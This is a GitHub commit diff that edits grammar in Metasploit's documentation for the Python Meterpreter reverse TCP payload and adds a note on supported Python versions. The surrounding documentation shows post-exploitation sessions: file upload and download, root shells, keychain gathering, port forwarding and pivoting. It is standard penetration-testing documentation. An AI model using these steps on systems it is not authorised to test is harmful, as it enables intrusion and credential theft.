Skip to content

Commit bd566da

Browse files
committed
Minor grammar changes and versions note
1 parent 4ec6923 commit bd566da

File tree

1 file changed

+14
-13
lines changed

1 file changed

+14
-13
lines changed

documentation/modules/payload/python/meterpreter/reverse_tcp.md

Lines changed: 14 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -10,14 +10,15 @@ for all of them.
1010
## Vulnerable Application
1111

1212
The Python Meterpreter is suitable for any systems that support Python. Some operating
13-
systems such as Ubuntu, Debian, Arch Linux, and OS X have it by default.
13+
systems such as Ubuntu, Debian, Arch Linux, and OS X have it by default. The Python
14+
Meterpreter supports the CPython implementation versions 2.5-2.7 and 3.1+.
1415

1516
## Deploying python/meterpreter/reverse_tcp
1617

1718
python/meterpreter/reverse_tcp is typically used in two different ways.
1819

1920
First, it can be used with an exploit as long as the Python platform is supported. This sort
20-
of information usually can be found when you use the ```info``` command like this:
21+
of information can usually be found when you use the ```info``` command like this:
2122

2223
```
2324
msf exploit(ms14_064_packager_python) > info
@@ -53,7 +54,7 @@ want to do this with msfvenom, like this:
5354

5455
## Important Basic Commands
5556

56-
Compare to a native Meterpreter such as windows/meterpreter/reverse_tcp, the Python Meterpreter
57+
Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the Python Meterpreter
5758
has less commands, but here's a list of all the common ones you might need:
5859

5960
**pwd command**
@@ -92,7 +93,7 @@ The ```upload``` command allows you to upload a file to the remote target. For e
9293
meterpreter > upload /tmp/data.txt /Users/sinn3r/Desktop
9394
[*] uploading : /tmp/data.txt -> /Users/sinn3r/Desktop
9495
[*] uploaded : /tmp/data.txt -> /Users/sinn3r/Desktop/data.txt
95-
meterpreter >
96+
meterpreter >
9697
```
9798

9899
**download command**
@@ -104,7 +105,7 @@ For example:
104105
meterpreter > download /Users/sinn3r/Desktop/data.txt /tmp/pass.txt
105106
[*] downloading: /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt
106107
[*] download : /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt
107-
meterpreter >
108+
meterpreter >
108109
```
109110

110111
**search command**
@@ -159,7 +160,7 @@ For example:
159160
meterpreter > shell
160161
Process 74513 created.
161162
Channel 2 created.
162-
sh-3.2#
163+
sh-3.2#
163164
```
164165

165166
If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.
@@ -184,13 +185,13 @@ To use a post module from the Meterpreter prompt, simply use the ```run``` comma
184185
is an example of collecting OS X keychain information using the enum_keychain post module:
185186

186187
```
187-
meterpreter > run post/osx/gather/enum_keychain
188+
meterpreter > run post/osx/gather/enum_keychain
188189
189190
[*] The following keychains for root were found:
190191
"/Users/sinn3r/Library/Keychains/login.keychain"
191192
"/Library/Keychains/System.keychain"
192193
[+] 192.168.1.209:58023 - Keychain information saved in /Users/sinn3r/.msf4/loot/20160705211412_http_192.168.1.209_macosx.keychain._271980.txt
193-
meterpreter >
194+
meterpreter >
194195
```
195196

196197
## Using the Post Exploitation API in IRB
@@ -202,7 +203,7 @@ meterpreter > irb
202203
[*] Starting IRB shell
203204
[*] The 'client' variable holds the meterpreter client
204205
205-
>>
206+
>>
206207
```
207208

208209
**The client object**
@@ -272,7 +273,7 @@ Step 3: Upload the native via the Python Meterpreter session:
272273
meterpreter > upload /tmp/native.exe C:\\Users\\sinn3r\\Desktop
273274
[*] uploading : /tmp/native.exe -> C:\Users\sinn3r\Desktop
274275
[*] uploaded : /tmp/native.exe -> C:\Users\sinn3r\Desktop\native.exe
275-
meterpreter >
276+
meterpreter >
276277
```
277278

278279
Step 4: Execute the native payload:
@@ -297,7 +298,7 @@ System Language : en_US
297298
Domain : WORKGROUP
298299
Logged On Users : 2
299300
Meterpreter : x86/win32
300-
meterpreter >
301+
meterpreter >
301302
```
302303

303304
**Example 2: Using exploit/multi/script/web_delivery**
@@ -312,7 +313,7 @@ cannot talk to the SMB service remotely on the compromised host because it is fi
312313
you can use portfwd to establish that tunnel:
313314

314315
```
315-
meterpreter > portfwd add -l 445 -p 445 -r 192.168.1.220
316+
meterpreter > portfwd add -l 445 -p 445 -r 192.168.1.220
316317
[*] Local TCP relay created: :445 <-> 192.168.1.220:445
317318
meterpreter > portfwd
318319
@@ -345,7 +346,7 @@ To do that, first off, look at the ifconfig/ipconfig output and determine your p
345346
meterpreter > ipconfig
346347
```
347348

348-
Make sure you know the subnet, netmask, and the Meterpreter/session ID. Back to the msf prompt,
349+
Make sure you know the subnet, netmask, and the Meterpreter/session ID. Return to the msf prompt,
349350
and establish that route:
350351

351352
```

0 commit comments

Comments
 (0)